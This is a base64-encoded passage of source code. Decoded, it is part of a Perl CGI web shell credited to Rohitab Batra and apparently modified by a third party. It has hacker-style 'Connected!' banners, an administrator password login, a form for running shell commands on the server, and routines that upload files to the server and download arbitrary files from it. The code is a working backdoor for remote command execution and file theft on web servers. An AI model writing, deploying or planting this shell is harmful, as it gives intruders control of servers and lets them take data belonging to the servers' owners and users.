3ByZT4KCjxmb250IHN0eWxlPSJmb250OiAxNXB0IFZlcmRhbmE7IGNvbG9yOiB5ZWxsb3c7Ij5Db3B5cmlnaHQgKEMpIDIwMDEgUm9oaXRhYiBCYXRyYSA8L2ZvbnQ+PGJyPjxicj4KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+Cjx0Ym9keT48dHI+Cjx0ZCB2YWxpZ249InRvcCIgYmFja2dyb3VuZD0iaHR0cDovL2RsLmRyb3Bib3guY29tL3UvMTA4NjAwNTEvaW1hZ2VzL21hdHJhbi5naWYiPjxwIGlkPSJoYWNrIiBzdHlsZT0ibWFyZ2luLWxlZnQ6IDNweDsiPgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4KCjxmb250IGNvbG9yPSIjMDA5OTAwIj4gVHJ5aW5nIGNvbm5lY3QgdG8gU2VydmVyIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4KPGZvbnQgY29sb3I9IiMwMDk5MDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+IENoZWNraW5nIFNlcnZlciAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuPC9mb250PiA8YnI+Cgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgoKPGZvbnQgY29sb3I9IiNGMDAwMDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+XCQgQ29ubmVjdGVkIENvbW1hbmQhIDwvZm9udD48YnI+Cjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0shIFlvdSBjYW4ga2lsbCBpdCE8L2ZvbnQ+CjwvdHI+CjwvdGJvZHk+PC90YWJsZT4KPGJyPgoKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsKVHlwaW5nVGV4dC5ydW5BbGwoKTsKCjwvc2NyaXB0PgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEFkZCBodG1sIHNwZWNpYWwgY2hhcnMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgSHRtbFNwZWNpYWxDaGFycygkKXsKCW15ICR0ZXh0ID0gc2hpZnQ7CgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsKCSR0ZXh0ID1+IHMvIi8mcXVvdDsvZzsKCSR0ZXh0ID1+IHMvJy8mIzAzOTsvZzsKCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7CgkkdGV4dCA9fiBzLz4vJmd0Oy9nOwoJcmV0dXJuICR0ZXh0Owp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBBZGQgbGluayBmb3IgZGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEFkZExpbmtEaXIoJCkKewoJbXkgJGFjPXNoaWZ0OwoJbXkgQGRpcj0oKTsKCWlmKCRXaW5OVCkKCXsKCQlAZGlyPXNwbGl0KC9cXC8sJEN1cnJlbnREaXIpOwoJfWVsc2UKCXsKCQlAZGlyPXNwbGl0KCIvIiwmdHJpbSgkQ3VycmVudERpcikpOwoJfQoJbXkgJHBhdGg9IiI7CglteSAkcmVzdWx0PSIiOwoJZm9yZWFjaCAoQGRpcikKCXsKCQkkcGF0aCAuPSAkXy4kUGF0aFNlcDsKCQkkcmVzdWx0Lj0iPGEgaHJlZj0nP2E9Ii4kYWMuIiZkPSIuJHBhdGguIic+Ii4kXy4kUGF0aFNlcC4iPC9hPiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGJyPkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KClBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSBmb3IgbG9nZ2luZyBpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRm9ybQp7CglwcmludCA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KUGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPGJyPjxmb250IGNvbG9yPXJlZD5vLS0tWyAgPGZvbnQgY29sb3I9I2ZmOTkwMD5FZGl0IGJ5ICRFZGl0UGVyc2lvbiA8L2ZvbnQ+ICBdLS0tbzwvZm9udD48L2NvZGU+PC9jZW50ZXI+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2FpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9nb3V0CnsKCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUKCSZQcmludFBhZ2VIZWFkZXIoInAiKTsKCSZQcmludExvZ291dFNjcmVlbjsKCgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7CglleGl0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdAojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0CiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyCiMgdG8gbG9naW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ2luIAp7CglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZAoJewoJCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD0kTG9naW5QYXNzd29yZDtcbiI7CgkJJlByaW50UGFnZUhlYWRlcjsKCQlwcmludCAmTGlzdERpcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoKCQl9CgkJJlByaW50TG9naW5Gb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJZXhpdDsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJbXkgJGRpcj0gIjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiY29tbWFuZCIpLiI8L3NwYW4+IjsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyM2NmZmNjYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgokUHJvbXB0CjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI1MCIgbmFtZT0iYyI+CjxpbnB1dCBjbGFzcz0ic3VibWl0InR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZURvd25sb2FkRm9ybQp7CglteSAkZGlyID0gJkFkZExpbmtEaXIoImRvd25sb2FkIik7IAoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+CiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IGNsYXNzPSJmaWxlIiB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+Cgo8L2Zvcm0+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0KewoJbXkgJGRpcj0gJkFkZExpbmtEaXIoInVwbG9hZCIpOwoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CiRQcm9tcHQgdXBsb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCBjbGFzcz0iZmlsZSIgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+Ck9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgaWQ9InVwIiB2YWx1ZT0ib3ZlcndyaXRlIj4KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+ClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4KCjwvZm9ybT4KCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBDb21tYW5kVGltZW91dAp7CglpZighJFdpbk5UKQoJewoJCWFsYXJtKDApOwoJCXJldHVybiA8PEVORDsKPC90ZXh0YXJlYT4KPGJyPjxmb250IGNvbG9yPXllbGxvdz4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLjwvZm9udD4KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250PgpFTkQKCX0KfQoKCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXIKIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gKIyBmZWF0dXJlIHRoYXQgc3RhcnRzIHRoZSBkb3dubG9hZCBhdXRvbWF0aWNhbGx5LgojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RG93bmxvYWRMaW5rUGFnZQp7Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsKCW15ICRyZXN1bHQ9IiI7CglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBleGlzdHMKCXsKCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsKCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkcmVzdWx0IC49IDw8RU5EOwpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LAo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPgpFTkQKCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJfQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdAoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOwoJCSRyZXN1bHQgLj0gJlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbXkgJHJlc3VsdCA9ICIiOwoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJCWV4aXQoMSk7Cgl9CgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhIjsKCQkkcmVzdWx0IC49JlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t